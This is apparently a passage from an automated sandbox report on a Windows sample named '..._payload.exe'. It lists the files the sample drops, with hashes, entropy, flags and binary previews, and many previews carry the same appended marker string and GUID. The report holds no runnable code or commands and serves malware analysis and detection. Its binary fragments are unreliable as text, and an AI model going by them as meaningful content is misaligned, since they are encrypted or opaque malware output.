                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):354
                                                                                                Entropy (8bit):7.303125033705204
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Q3ILtQpVJM0050H+yRvDHGcGMugLdOZ91iXQxJg2JOWc3cii96Z:QYLt+M02rsvbGc9uqAQcmgJc3cii9a
                                                                                                MD5:C7169375E6131F795462DE4234240C45
                                                                                                SHA1:3E3427B2ABBCCFD869A1941454A95F323B3C0F75
                                                                                                SHA-256:139609B06A5BC5F0977E76F6727BBC1FD8F0DACA9886E8621DB23AA28703B1AE
                                                                                                SHA-512:B1158AE495AB8F198C4AE4638862C5A581B8154E1542CE767855C7E4B8102119E32EFE1BB4B84084F09E9853A88773383027DF8A85DB4478A76E9D630C806EBE
                                                                                                Malicious:false
                                                                                                Preview:1,"fu...q{.....Mq......$.oU+.#..!...[.......r_..377.H....O.\..[E.i..m..lZ..6~Z...J.s.v.....3<Ra..j........."@.e.....5..O....../J:.u..C.....!.......^.2.h.L......UtL..~f.]..2..E?(F!..5M....;....=.YKx....D}..|....y.........2.b.b....V...5..5.D.NS...&&.r..$..PhN4=k..MBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1210
                                                                                                Entropy (8bit):7.835256339476026
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:UN47P9/duAHgnZ3i04Q8OJgEzo4jsTSpp722x3bD:UNCP9/dusgnZy0CCzoqsm+6LD
                                                                                                MD5:07C0BD441DC1431E6E0760458257736B
                                                                                                SHA1:7C205BC98249CBFDC039E1BCA52F756A05D5279C
                                                                                                SHA-256:31795E620976E15E739202067D60074BD0315E1074DAAF8353E952AB60508305
                                                                                                SHA-512:32134B8C1A714189091384E3866B82D30E22C1BEDEDF44E27708AD81F3F6DFC6DA1FCD11BFFDE2D4892BB823E0E2CDBFC1940D261A781644A631C0F724C2E268
                                                                                                Malicious:false
                                                                                                Preview:1,"fu.[..%...".E..`<.V...........o>.,..)Yv.*..yZ...W..;:..l,...w.`..\...c....c~.M{3.U.v..;....K}.~.d.s^...S7..HV6.S./.- ....;.;.{D.@Tx.F.J1gy....L..cU._..?.U4....3....d.+....JI/.....=..b...G.T.S.p.1.9.1..yU..../....9p4..:4..S..\d.&$?..m..nL.G..W...A3W..V..L....^..T..%....mg?...I/....<..2'd...A.D0..#...;..A..,.]........*......9...Fr1......m.B.!.PYFOM..9.....q.[..\.*.c...H1.-Pb.........bmA.~..h.`cw..:...........L.....;B.......c....P...O...1B.E.|*.uJ..;..P.a,...c...1.&.3.J.&$......F_$........sB......T.e.Z\.y^z}...~.O.b.Sk....z....O..*]..Z@A..Z.I.I^./.....)..L.+rT...p.M2.g....S.|.r..=$.G.5.i.5.....m...b.>d.|s.Y..,...K.c./..\N..d+'.pD...xU....Wn..w.......:^hc.i[>..."..j..........N.~d.. 5u.~.l}c.....[..|xW5.......o.6.H.....h./..n.+Yw..b.HS>|z.>(.........Y2A....+P.7.... gT..%[.~.x.bW..p..f...j.B..~-.u...7.uh...\.tw.....X.z..`.i....o..(...`....Z<.7.}..F.o.7eM....>..0Y.u..C...{......F.e#......O..!{|..f..pmf..(.d.x.2.z..*...W.eW3.j..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16718
                                                                                                Entropy (8bit):7.98876548539806
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:zx5ShCSavfNfPzFMQlEslgEHtbwrCNE87UQduSCrvb+/dLI:loUSanV1islgEtZNZYcuSCu8
                                                                                                MD5:A1306AA72B40EF8991B452C221E546C4
                                                                                                SHA1:F0023F0E0C39DE0E0E4632C0ABBAD984D7A50661
                                                                                                SHA-256:9FB158FA162CA3B035052BD03A3CD361CA1597A41ADAD35D0514AA1E1B7A01FB
                                                                                                SHA-512:07E8CE342CB2AFF54149B313F686EA0569ECC5CF3BD9BAF951CAFC4879326F14E0BA8D5EE6C23F206DA9B69D7E79BFFCE4C39C487707CAF84419C3F7B0734EC4
                                                                                                Malicious:false
                                                                                                Preview:...@...W.h......Fe&8).......~<F..wcuS...7n..z%.T....`.e.#...-q.!........O.'.a...Z..H.%....}%.'..8.........W....Y.0.D:0.Um.teo.."Y..9.P.L+....+...&...x....#6.0.:.........$..H5.jm3st!..A.GfB.T.c...z..d *..+..t.u.vUg.B*@E.F|.r\.-.fc/3.+..h.v...V.6)G..a.......I...gr...W~zNt!.....M[&..=...:...n{1Q....d{...y...u.&.\9...3.f.H..m.......tf.6..3..&.Wt-..T^.E..m:....;p......Vp........7...0W.W^.+.l8.DA.;9...>m...L..FU.x:v....r.n@'t6.:...T.:-K...c~2 .,"..8|a...o..".}/.n."g...*.......%.<91B........%..>.\.j."...L.........%i....c...d....q...0..#...'...<y=........Q'.Q.V..(r|9..z...![*..%7Q .q..S...~.....:..ur....^)..Z].L..V'k..Y..@.m.9....:a....@OF!.....s.t..Q.f"[M...$......-.$...|.2.1..=.F|.P../...d..d.u.Rs..a.^Ij....,....9.1...p....c...J..!n....>:d...Y....0.j...EY.L.DGq...1.p..(>=T..M..Y.D.e..lzw.!.J..YD..Yc...e....V..H......./.C..f..-...C..@....d.....%.=".sDq|\[=.6.|'..Y=..q5./...4....x~<..@,5.&..NH... .....Ia4.v.>.d.s..Y...*vW..ked..pS`.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):904
                                                                                                Entropy (8bit):7.744623933356339
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TtR1J07s8A3jJZMkI3ViYXTFsnrKm5hxuC2OSx3bD:L1J0C3ENMYJS5hr2OmLD
                                                                                                MD5:E6460085B2CE84D4DD5519A830BAE84A
                                                                                                SHA1:D7119B66A64DD783CC25FE0EE1FA7BBD6F3934D9
                                                                                                SHA-256:31E469BF920CAFCA7E67B060045D80625CC0D860D5B9F7A5D090E75BADB819FA
                                                                                                SHA-512:EBF3996A8F3D7DEDFA4D30EB65FB916B537F74FA125491ACD91407B1B03845FDC0510FA63C84D45F3F176FDB7456CD26EF2676D53E44A0A845D43973DF954403
                                                                                                Malicious:false
                                                                                                Preview:.f.5...S..`?fy...%h...O...G... ..Q....M.{......;..7..&.....J....}X.#TE...%.k.XP..Y.*a.....|L............L..I......oV..S..V.........@.%...&.mSpc{.@OkHQ..x9.;.=8..i.....)9/...*.;...3=o...s.}aGB (%..92M..V.l.q.B|o.H;F..e"XU.3'..P3.?V~s..5|...Pe|+{T.......J.V...V..4...d..C.......z...a.r..?...3.......y.o>k.W?#..i.-%.[.;\.B2....3..I..r.l.....*......?0.ro........XQ....'..........6.e.O.T.C...|."o..7.3.......:...d@.L....V....wb..."....J......U..?|]{.a...I....:....`^...4z...K....!.s.ky..<o.6I....Z........w...e.....)=@....G$6n..m.}O.0.....y\.j.^}...."...)...3.^...w.&..:.....|J....V...".u..[.J.l..........-.F.YO.."./I.e.....9..^x.-.....@..M....d.?'.(x..*..N.I...n.7..$.*..g..'.Ya..q.YH..p....6 .;Qs.x......<s..$Y........M.&....C.L..y....[.]|y Y..f0u..u.o0..'._.FaE....hI:f.ly>..Y....DH!BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):490
                                                                                                Entropy (8bit):7.5142319150740695
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Sy8J3ERixTR+CbcstUg7yhd8hSO+rJSgJc3cii9a:j8VxOsWhh1r0x3bD
                                                                                                MD5:122DC5BC8E475FE53FDEDA49BB3B499D
                                                                                                SHA1:5870F0CCEFF6F76EB6D29575C0FC7E7243F2CC38
                                                                                                SHA-256:D8E7FE24F8B9E6CC70393B2CB2D6F36BE39A731F181849CCF41570DA1D9D3416
                                                                                                SHA-512:E87AFBD1888F7BDAA9403B123F893E7EC24DEBFF7E74DE9411A270DC817A2DDA52CFC0075B21D27622BF14AB2B82CD234724D31817C41F53204D9306159A8656
                                                                                                Malicious:false
                                                                                                Preview:*...#..UK...7.._Wq8..Pd.q..aH%M!J.Do.5^.C..H.5s.#Z...........v.....pe..d..".Y.......9...._]J.R ..q.bp. ..0..:...._.....Q.....q...z.....].=7/K...7.&..S.V~............%)..{.fq..H....[.S.J...*@.`Z.s.G....di.R...../Az>..r...].;O|.~..s...=..Zn$a..t.tl..C....M.....|(i...#....U?...\H.`3#.......Wv.....>*......\.x"..64.on.4.Qu..g...MW..ik....}.3.'..:....{....1;."......._...}9.ej.u......\.@.EeN2.....\.w..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):374
                                                                                                Entropy (8bit):7.290068059156657
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:fPevvm1q85xc2ou1WXdS/4ONsL/0l5B1wXwgVw1sy0nmrv2JOWc3cii96Z:fPevvm95a2oumZi+/GNcIP0nmrvgJc3X
                                                                                                MD5:704999BE8B2E83434DB8EA2E05139B85
                                                                                                SHA1:C5E93233C853EFE7A1673DC4C3184FB808C7CCEF
                                                                                                SHA-256:01AB881CB73358D3DEEB50AD4EADFCF4795424D520DD97D500C978CF9C5BEC59
                                                                                                SHA-512:DFE77E14F237B9476BB77F00A2FD228C8FFE1029651580E20D7EE57613771DD385EF693CAD5BA99C650C482F937E7929B1779EFDA982D94182399B33FE235722
                                                                                                Malicious:false
                                                                                                Preview:.On.!.\....G...A.w..o.e.B...,..2..e..{.............9........S......B....s..4:Egc.....!.....E..o[..F...!2...hq.........D>.[t....).]%..Ws..6..5.....[Hc..|.,.Q..................w.bVO.....2U..`aD..y.8N.m?.\.TU......J..NI..s.@.e....*-.0..`Nn.c.~.rXGx,c.Q.gw1....v{j..(.wmNb.s..N.v.*..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):684
                                                                                                Entropy (8bit):7.701267184590864
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:k61GGZSEWwnd3AmtPsGKa9Oh1d0Lj27uVrOVfTL1BILKIQnkJ4jCiFm7pisUmRNo:91Yw1cfaU/VucfHDILakYy7pisttmRxn
                                                                                                MD5:DD36A14973F2CF33E3D5BD45D1087523
                                                                                                SHA1:E1C0E695089CBAD4D5CE850F5937123FB7EC471B
                                                                                                SHA-256:C99B31ACCCEEF9D8190FC2536BC246E4182DEB40A6C86986C3A4AA9ACB68E287
                                                                                                SHA-512:C7E24ECF1FEBD7082942441913529D40589595709B9950E5AC72E0A2E4ED32B08A982C0E98AF2274A828BE96471959A9840284A6D2C5BABB635618275E82DE17
                                                                                                Malicious:false
                                                                                                Preview:2023/DV....#7U.......5......J.=.&....5.?.F........d..?PB".../._.w..gM.<.KEjLg~M.h.u...<,t...\.Y..$.L...~.@....L)Z1l.EE....4.}...*2..\.+.]..%dJ.O......o....U<.}..&...F...^UX...._4..y..[Ij....dv..?.!..f.q.P...wz......)'.....,.s*...t.l.as.&..&7/.cT:0......Q..d}.../"d.$..R..$.O.,...c....e.3#..p6!..$Qw...9:|7...(.....'Xw..G...y.(..R.\..z...a"+p.kB...x.C....a.W......?.U|>...<...~.C"..@i.n..r-....H....M6+....j.....({...Hv..x.....Pk.6....A./..-.s. H...W.[.q......f...V..rlPP.."]...|....B..!...h.-.Y^.........".O?..g.....Z..}.......S.3.......D..g.'y.....=...yf6$C..\l{.|..G..2*.....=BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):395
                                                                                                Entropy (8bit):7.2839492167778
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:SbUzsvQYMfQupVcbg32vU5J8UM7Vkm6SgJc3cii9a:7wvufQu4bg35+UM7Vkm5x3bD
                                                                                                MD5:275F71DB54F89A74BB90468D5BB9248F
                                                                                                SHA1:7795E2082B9B7E523961E79E1FB8193466B3A2A7
                                                                                                SHA-256:51821048A5793055C319E894952F337C83D042A7ACF6C9F129C46A85D5719711
                                                                                                SHA-512:35FFF136FD7318A20AC9127E378BF0700DC2A7691DE4D9B481DB9F85EE83AF849806A84D3C52D268386EC095E2A5FDC2772CE4DDC86EF11E01C62B4258A7ACB9
                                                                                                Malicious:false
                                                                                                Preview:*...#.?.nh...T.n.?V...s...(.<.YU.....m1JF..8..#E....).(..;.TcJ..-s>y...;.?M...Xc.y..>n.?$......YI%.....d7L%"...-F.(...X..[?.L...,$..*..*.G9Fy...P..)m`..:........fT....* .p<.....x.q........CG...3k7Z..'...M... ...:.l..W...}....7..ZD.`.h..v..."R.F...r.^..`.{m6..kp`.Q5..~....E.s..bo...F.kIX..8...Ui.CBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):129419
                                                                                                Entropy (8bit):7.998592151541035
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:EPdorZmN8YOhglv1Tq6uGEX4m8oQKVnrSxg8XxcDqM:ElwZmDOhEhgGTo5JGhWD5
                                                                                                MD5:CCF3D1CBB6C9C2E8DC52F787C54DEBB9
                                                                                                SHA1:52659A69BBD5E0597C25912A71EEBA22ADFF06CE
                                                                                                SHA-256:D10C4A2C54333309CA5E5EF48E1B622BE3444DF4A7FE9DAE43B82782A44DF610
                                                                                                SHA-512:FE403250DE7BECEAD6518709097E1DD07219A9801D703B94978275E993386382ABC646747DAAF71B7398FC6A621976CA39E084C9571F497122FB724290A968F2
                                                                                                Malicious:true
                                                                                                Preview:{.. .f..!...6z:B...........M..!U...FW....m..{...|eA.`s..^.....|r..ploh5....h..C"I.....)..k...D...B-.Hg+.E.....rz..b...k.L..wf.Y{.......X....i....S....*..[Ek...2_}.z..o..w*.'(.M.c.[.Z.u.....".e...;..I^.....Z...(#o..YL.8j...;P.V4Ly....G.:...,..Q..*.....'....3...&...ll.4..\'O..N1..R.>..w.8=J.?.|*..Xuc.*.....k.uVl.*.imj.?.B.J...R.n...w.s...J&...A`7..t.k.....D...].Z.....S.(\i.>.H..../].aw......J..[..N~j52......mT..+d.4...9...s.g.'O.9b..T..cT....s^.....Q...\b........ ._?.(.D.q[.Z2.8.2..<.K..y=.f. {..pW.O.V.IQkz}...Mz........T....V^.*H.qW.....^.Rg,..H.u;....)......x5..R...{1Y.).....h.r...t&.pkI^....G..7.7..M.r!..~....6...d.*..w....*.ov.CR....s$K|xo.z...qAuw.S.h......6.M@...k].F.Q.H..I..X )r.....=....;.H...a.W.20C..o.%.y.........zT.q.E?u.._.L.Y=h....(Y.3.................U...~.. .z..a.6*.JL_[....Sh....(.......n.?u...(hH..z.*.<..`6,.O([)..2[`....1......d.(Oo..n...o.\.}.....{.c.l...\.~T.v...$m[;...Y%.p..v.V.SG~.$O..-....}.........A...x.......q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):162608
                                                                                                Entropy (8bit):7.978670808415517
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:XtxhStPBHlZD6N1snnJeZPdKMmIDHWovS2w4bjoA8IJ:dTSRZD6N1iJeOMDD2ovlfEIJ
                                                                                                MD5:7A553F57CAF84105D6EDE0F2ECBE3C7F
                                                                                                SHA1:54BF0A9D56CC6834C1738A27A808D7AACBF51B7C
                                                                                                SHA-256:74EB6D1AAB78F4E642147CDEF2A15B818C8C3B58CC003FD46CD7F3692692F974
                                                                                                SHA-512:0C8F11F8145E7984B87AC8856500D7BC1DB37E01682C7D0347034F207D9D8EF29A705280FBB951EC3E9FABD6D983DA823EB9D5F4023462125BD3684A0065A049
                                                                                                Malicious:false
                                                                                                Preview:{"Maj......&.........b..J....!...].q. ..?....h.......F.-2..N........PK...Qh/K.*....FZ...n.<v,....{...n..M...A..'/b}....A.,..c.0h}.rZ..Jg...Y#b.b7.e8..+...Z.Hjg%.wI6..E.......c#.D...{....W.y.....a7...q.`|..BR.$. .'.{....Y]{....h..$.B..R.dK..y."L.....z.I....{...f......R...;z.....+..Fw..*....Z...U..b...|...97a.i........jK......D.!P`@v...)....sSL7I.>..+._.*....pg\.w..x)zw...{j!..jU.vd...UM.!e..d.....<..&..S.;....VD.t...O.]...X..Q-=g..].\{.<...:(N5!.F-o...&.....:..X.!E.ZW?...0B..l..6z.y.:..H..d...b...D.m..~..S..A.. W.^..Ype&QR..[.I.3a...L...0...sTi..n.$..\].......Fo.7'.R..Q)..EL..,...!8............"..Uw..Of...`#.\..Hz..}.-.r...6.*.s2.._gqmJ..q......7.G]..ZI.g=..WK.I..}t.Y.CC..?.<.CU.7.bS...5&7..G....O...j.-K..6.f.D......<.....M0..?8....?.WA.7Nw.F+..C.6.]|.?..p.:..d.\]Vz.argx.p.jSp..I.h^8sp....B.^.m.0v.C.]2W...T.}...#.Q.......|...-^}...5..!..#.7h..K.[.v....g}.....C...M.'V=.*.B.../.....:....a7..'K.*.`Qg...P0.x...#. .|f.$.."..[...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2203
                                                                                                Entropy (8bit):7.89654018277714
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ydrTjT4czg5fbFt3cR6SRCitl+cQUsJabi4a95eLD:WTj0czglbFt3std7DbiTm
                                                                                                MD5:6E0F18CB050E3D45EB156E939BC0F881
                                                                                                SHA1:663F7EACBD0BB852CA4648A1212FB15E810FBA02
                                                                                                SHA-256:37A61220A89121E85BB3268C1D4A22EB0717E7D76F50078B3E04ADD4CA0A938C
                                                                                                SHA-512:12263B399EA240B79684BBF1A39E1C201CE7DC9982E2059B8D228D31585E2B03F9CD5CB64C2AFDDB09485E31A0F73C802B1FCDEDAC5E1E6E73FCB32AB1125F24
                                                                                                Malicious:false
                                                                                                Preview:<?xml..D.M..P..V...B5n..P.f......0,2.G..R.j..'.t...........XR.- ......$O...)0.{.T......S".c....E..(.M..6dl..~1..~...R.l.7V.a*o..."e..%....&.P..i._Cu....M...re.e...]).I....~.P6dUyN..P..{....<:...X...s~..d..O.._.zq~g...'.4EM.M.z.......~.V.^.y...D.ki.5 P&..."....l..}w.`.].2-..".......1a.v$.,.(.5..z4......rTs..'..XdR......FH.DX.h......5.-.....Bk.....a.:D..].o j..mKz.FT......I..q.&f...H...-......8.,...b.c..../......\.'.})W.$@.)-Z.....C.( d=.LE....z.o..R@`.t...I7V..YH.}e?6>"3...J.y{..QO#m...t@..),].:q.j2K....>.D.=,.%^.:Q"%..|Zr.m....o........ap....@c^..v.IT~.......^..l..u.fPql..B..P....n.....qx..30....$z.3S.~..X..A.=....X{.lZ......(..`Y9Le.."..1.(..b?.NHQ.......-y..&..W.a..~...f[..IM[..8.lal(..M./1..J)?t..9.)T...7.y/*...S.;....@.:..~Ate.(.5I..O,.",.Z.T..5#.}.L..Z....(.....c..@I.Z...[.....D.E.......c.sp...._...+f...dz.P.s.{Z.....^..4.......\s.\.....v.....F...O...g.K..?V.%.\.7?..w+......#dh.t.W.-.C..*..b1UZ......-...v .4..:Fh..'...n...... iR.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):238254
                                                                                                Entropy (8bit):7.234431785087958
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:SVie1aK1yAxlPUDqwchs3EJXkpqRdOAaa/dIDiAb:SXamyAz8WRHJUQdxIDLb
                                                                                                MD5:76B78A02D50C1E40BA349A97FF32E8D6
                                                                                                SHA1:C6627342799B25C99B2ED66509AAB98E7382814C
                                                                                                SHA-256:C6145D1C637504AB3E577A7EC68F36283FD2CA1779B24209DDEBC879BF42698D
                                                                                                SHA-512:A05C980647C18F5797438EF73D7EF0380AD5E94E9E2BAE1A1F2794E2D97B3CE8832E41C60F3EF56D27B9E5F76041BAFB192B2AA88954FC89D1DE781EED362AAE
                                                                                                Malicious:false
                                                                                                Preview:......,...GtW.:k..X..tm(..]@.U...q!.\$pf.-/C.tq...#.tg.Tc.RMt.-.....r...s.}..F=..a..M..PN.W.......V.j.\.M...e.$............,m.9e.4....e...N..E.5.. hz.q.4j^2R..,3I....JH.....;_[.N..CR."...#(.{..n... b.x.PAOknP..F.9...*F..V.O..a.5.:;.....4..H..|...Q......p..s.+6.....:.......*.Uo.]Y....8RZ.Lj........a&....f.....9.../..S...w.,...KL}*..10..zk....DB!.-3V9.S...ZL..T.......F..n.:..P......3[..i.Q..,.+.....T.".*..5....J....F.~Xow..~...D7.h...G..D.~O.'.i...5.j.ja...6.,.!..i].j-..p`.\.)...L.p....~...M...z3..x...s.....0.i......D...L,7v.5..p...w.^.j$........r..]B....E.._..4e..K.......3..d.$Lh........q.Q...(J".}q..Va/u...;Q .....p..f.....j<:..U...-..;$H`4.......@.;^"V,.....g.g...G..2.$..8.O.(..iJ...Q0G.a!i?Go.:x.....=.}.K.\..I,.....l..<....c..}RW.....:.^?.\......Y..dBgd..".lQ*...3.w...$U..md<..D4.7A..<A..4E.3L...7/.q. ...|O.:.m.. .#.3.]..Q.....ASA/..6S_..b.[5...a..I.._5:=.?.?.2p.l"...!....E.<...$.d.I.I.7...sgXF...P...+.,3..hX"..H.....,..!..(....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):240882
                                                                                                Entropy (8bit):7.261910762825548
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:y9LIBaQQYHBBWM/Aogp1bgVbJWtVYusEpn:yKBwYH7VAL1odk9
                                                                                                MD5:9EFA332DE0471F7009E3EA4BBEA9F9B3
                                                                                                SHA1:1AF2EFC0BAF8E0C34AACFB1E19FB40F8A90C143D
                                                                                                SHA-256:46B113EFA3DCF5B97AC0B3A5DC8FFFE0C963C9A53BC6564E701275B7313E67E4
                                                                                                SHA-512:70E2A80C2288AF3348B32B35E7D88710416F80886E8EF71AB9636732042603F4B1583581F3BF91A8A596C0AE41E1392BFA0B2CE3FDFEEEF3AE587796C8D6148F
                                                                                                Malicious:false
                                                                                                Preview:......]1+...`7.F............|.....f...i.3B...F~p...Y.`...^_.....T.A....@...8.W..xh.i1..#,....M......^f..Qc:g.7.-...^..[......F.....&....5l..Q.V\.I..Y.4......2.....h....Z.b.^.....0?.~m.N..S.o^...+.24v.....f.Y..l..F.p..S(..Q8........../.....d@.E8..j6.|...3...W.S.qd1....7...r.l.2d.7.d.}...<.j.-H.j.fI.....l^.s..l.$. .L.....6G..]fk..t..@..<.n..NEa.u..w.C.ZGw.....b.:.#......V.T.'g.....>c.:6c.j....y7.i/IZ......:.[p.>.F.v....Y[.&.J.UN.8...|7.TnRN..O.bX..r...J...t...F.o...m..3.N....!....Bp(H......W..ik..bJ.` >@._......i?..Q...M.G........f."r....5.~..7.....Q.LmF.....+.0%LP....]..%|..Y...NW... &N.`.....1..b.=}..u&5'.u..}...7.j8n..@M$v....al..I.(.......\..2a.T.z...9....c..w .~.\...3+QvSUa.L.WVdw......>RW..s.U.rd,k}.=..#..EJfg);L.7.Caf.H...a........|)(1b..n......i.!8.....K.u:.*.R/..]\.G..b<..E.&...n..-8..r.m....Mv..)9..a..uK....$...Q#..Jr.h*.....n........ .@.n................p%..o..".....5vX..<.....c....0#m.."T..].N.o.at[....W...&Pk..W.CR...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):241750
                                                                                                Entropy (8bit):7.2580381440320325
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:+uUCOyx2UdObMjlRqmcffpti3dQSrY0x+LlMsWSvq29:nO22UdwMjlimKyY0KD
                                                                                                MD5:F2ADF0806DC4B3510D69C4A95C44E297
                                                                                                SHA1:F489C34AA7FE73339AA4525588FED98EDDD24EDE
                                                                                                SHA-256:D1A19F237E1B3DA1F26C8AEACA910F0F99A9A0CC7267B141B2850ACB559D911F
                                                                                                SHA-512:0F11106A5FCA43B79527A036177DD59A4A4675FD946D4BC210DA3F8C837AAFD7F96DAAFCF9FA266BE50881F4E71A2086E49025A93F426460F992487A40E65373
                                                                                                Malicious:false
                                                                                                Preview:..........H......]cl........i\..nn......8..=..@....C..G.,@..t%%z.AH....s....NjMM.....F..3..w88-M..V.WQ%.3GR.OJ.V.....?S%.....TX.^).M..F6......f......H.G.o..(s.:...2..m.i...=..9....^.... _c9.>#\.r..i..U.zN.H(V.c.-'.e.#%P...]..<. .V.....=X\....03WHK.V..1..Q.1I..y...5...u&....r.E..<.....z..........*....6DQ...E..7O``.1Y*.....x.z.....<7,.....r..7e#r..E/.E3..f...M...#Wq.|/H.K.......sdw7..1.1....n&<.....T?z..<.4}ad..G..<U....&..i...4)+./K...8..Vf.JI.g_..*...io........di.uF....L5..Qd.M%.a.\E.....(..t$..K}.?:..2k....;......+qH....Q.;Q.Y.|..........K...{...\2.^..0.&....$MF]i.....d.Q.........P.5....-...`.F#..),.Yh. .../k..@T...$c.=..<.........hD.8.....Bj..\.u...1.'.....GKx^r..1...6r....^.6..%g.v..&.Ya..T.eS...@r.C.4.ci..6.....'...C]S.3J.U..]...N{N.-..s....(P?....|`.W.O...3%.T9...D.;.W...H_zK.]...|D.../].e..v...g.7......u('L...j...EU.F:..$h.}h..1..#.I..4...JC~."`...z.a.r.l.... ..;.ik...]..L...8h......v..$.<.dj...J.OY6S..Mu.Vc.s4.yH.c.b.F\q.7......1.. .7^..d..^
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):238962
                                                                                                Entropy (8bit):7.232126830030726
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:rc+AGUiLhEFXj+1P1ary/6CLlOZ9yUwe4qu6EccgnENwHg+44/KPxBvdbVp+AxH4:WBq/N0+ex5UwHraPxBvdb/tDpAn
                                                                                                MD5:12E69F4FD2E784E9654837398D7F4334
                                                                                                SHA1:3BE3A7A1BF0DE5256CD092BB76A7D4FD88955DCD
                                                                                                SHA-256:142E9A405C24927D693FB825C77BD8CDB0596BCFB1DE4E692AE5F51732F169BF
                                                                                                SHA-512:3CAEBE51945204CB492C9B41F6BF4BBAF6FC995DE04000038247F7186D8A85E4BB69D550AB22C096418F9F56DD3187546F267F3C09F111BD35400FB81597E9C9
                                                                                                Malicious:false
                                                                                                Preview:.....1...w....<..l .{Y.......?.........m.}......A.}....*.v..S."t/.Y...e ?..v......<.....>)D....@..-d..gL..3..O[.x...l...W...~#.hA......Q...h@|.KN.`.z.q..p...k5.g..<.3...]......@H..1.`t.pQY...^.|m..+SSJ........5*.........?'...wq>Ggr.....32..EZ~.^!..;C>8.'.z_d.".6...d.E..ZfY.VHV8M}.J.-H].D.........})P..>n......LV..$H.........".<.7_a..N..... ..U8..*.F.>,p.'T.Qv.D...{!...J..;[..k.U.jz0Z....=.f.!.50....B.a.F....}..04..2..q..N..f.0g..."....5....k.g.....\}.q.G.&...a......7..~...?.Y>.Q....M.%2C.6..f.\..V2.g~.6.C.....R.cK[tx>...f..S....;..u.......9E-.b'.G...-...k..W.q..Fz..DO$......o.mTX"...G.....n...X..UZ.a G.........f.;r."..{.|.p.le.)...E.S.......3..#:.9/.G-. ...s.$.G+.X....DY.a-N.:....(...|..j.6..mG1..YP.Cj.i..].........?..H....bq.0w:...:.....x.:QVF.pC.2"G.`.....s...\......w..:..o.8....X.?eq.JOQ...h.&c..TA...a8A....@.....0.8V..O...qel...q.(.*f..+..Wd.wvT.<.d..aS...n.........G.$.*._B..I..il.|w.......p.y.4.7......o.T..E.3G%n.H'...:K.
